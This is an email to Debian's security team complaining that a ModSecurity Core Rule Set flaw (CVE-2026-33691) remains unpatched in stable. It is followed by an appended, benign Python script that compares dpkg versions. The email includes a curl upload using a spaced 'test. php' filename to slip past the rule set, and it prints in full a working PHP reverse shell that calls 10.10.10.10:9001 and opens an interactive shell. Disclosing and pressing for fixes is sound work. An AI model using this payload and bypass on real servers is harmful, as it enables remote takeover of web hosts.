I see:

root@4cbc316d5a12:/# dpkg -l | grep modsecurity-crs
ii  modsecurity-crs                3.3.7-1+deb13u1 all          OWASP ModSecurity Core Rule Set
root@4cbc316d5a12:/# apt-cache policy modsecurity-crs
modsecurity-crs:
  Installed: 3.3.7-1+deb13u1
  Candidate: 3.3.7-1+deb13u1
  Version table:
 *** 3.3.7-1+deb13u1 100
        100 /var/lib/dpkg/status
root@4cbc316d5a12:/#


Still the old version in the stable Debian.

and I tried as a test:

relunsec@relunsec:~/CVE-2026-33691$ curl -i -X POST "http://127.0.0.1:8082/upload" -F "file=@test. php"
HTTP/1.1 404 Not Found
Date: Tue, 14 Apr 2026 08:23:17 GMT
Server: Apache/2.4.66 (Debian)
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.66 (Debian) Server at 127.0.0.1 Port 8082</address>
</body></html>
relunsec@relunsec:~/CVE-2026-33691$ cat 'test. php'
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down.
// RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 [email protected]

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.10';
$port = 9001;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

I see nothing blocked.

On Mon, Apr 13, 2026 at 4:43 AM cyber security <[email protected]> wrote:
>
> Hello, Debian Security Team
>
>
> that is 15 days, the CVE is still not patched,
> https://nvd.nist.gov/vuln/detail/CVE-2026-33691 it is already **High**
> officially by NIST, and a Metasploit evasion module will be soon
> published and I will open a PR linked to the issue
> **https://github.com/rapid7/metasploit-framework/issues/21228** and
> PRs are open **https://github.com/MarkLee131/awesome-web-pocs/pull/1**,
> you left users vulnerable to attacks. Only unstable users benefit from
> the patch, latest users remaining fully vulnerable, users are waiting
> for patches from Debian, and it is still not patched.
>
> Best Regards,
> RelunSec
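An added check, not part of this thread and not code from the Debian or CRS projects: a small Python script that reads the `apt-cache policy` output pasted earlier and decides whether the installed modsecurity-crs package is older than a given fixed version, using dpkg's version-ordering rules (epoch, then upstream version, then Debian revision, with `~` sorting before everything else and digit runs compared numerically). The thread never names the Debian version that carries the fix, so the `3.3.7-1+deb13u2` used in the demo is a constructed placeholder, and the policy text embedded below is the output shown above.

```python
"""Added example: compare an installed Debian package version against a
fixed version using dpkg's ordering rules (epoch:upstream-revision).
The fixed version below is a constructed placeholder, not a real Debian
upload; the policy text is the apt-cache output quoted in the thread."""

# apt-cache policy output as pasted earlier in the thread (sample input)
POLICY_OUTPUT = """\
modsecurity-crs:
  Installed: 3.3.7-1+deb13u1
  Candidate: 3.3.7-1+deb13u1
  Version table:
 *** 3.3.7-1+deb13u1 100
        100 /var/lib/dpkg/status
"""

# Hypothetical fixed version: a placeholder, the thread does not give one.
HYPOTHETICAL_FIXED = "3.3.7-1+deb13u2"


def _order(c):
    """Character weight used by dpkg for the non-digit parts of a version."""
    if c == "~":
        return -1          # '~' sorts before everything, even end of string
    if c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)      # letters sort before punctuation
    return ord(c) + 256


def _verrevcmp(a, b):
    """dpkg's verrevcmp: alternate non-digit and digit segments."""
    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        # Non-digit segment: compare character by character by weight.
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i]) if i < len(a) else 0
            bc = _order(b[j]) if j < len(b) else 0
            if ac != bc:
                return ac - bc
            if i < len(a):
                i += 1
            if j < len(b):
                j += 1
        # Digit segment: strip leading zeros, then the longer run wins,
        # otherwise the first differing digit decides.
        while i < len(a) and a[i] == "0":
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        while i < len(a) and a[i].isdigit() and j < len(b) and b[j].isdigit():
            if first_diff == 0:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def parse_version(version):
    """Split 'epoch:upstream-revision' into its three parts."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:
        upstream, revision = version, ""
    return epoch, upstream, revision


def compare_versions(a, b):
    """Return -1, 0 or 1 as a is older than, equal to or newer than b."""
    ea, ua, ra = parse_version(a)
    eb, ub, rb = parse_version(b)
    if ea != eb:
        return -1 if ea < eb else 1
    for x, y in ((ua, ub), (ra, rb)):
        c = _verrevcmp(x, y)
        if c:
            return -1 if c < 0 else 1
    return 0


def installed_version(policy_output):
    """Pull the 'Installed:' value out of apt-cache policy output."""
    for line in policy_output.splitlines():
        key, _, value = line.strip().partition(":")
        if key == "Installed":
            value = value.strip()
            return None if value == "(none)" else value
    return None


def needs_update(policy_output, fixed_version):
    """True when the package is installed and older than fixed_version."""
    current = installed_version(policy_output)
    if current is None:
        return False
    return compare_versions(current, fixed_version) < 0


if __name__ == "__main__":
    current = installed_version(POLICY_OUTPUT)
    print(f"installed {current}, fixed (placeholder) {HYPOTHETICAL_FIXED}:",
          "UPDATE NEEDED" if needs_update(POLICY_OUTPUT, HYPOTHETICAL_FIXED) else "ok")
```

Once the fixing Debian upload is known, replace the placeholder with that version string; the comparison follows dpkg's own rules rather than plain string ordering, which is why a `~rc` suffix or a two-digit patch level is handled the way `dpkg --compare-versions` would handle it.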
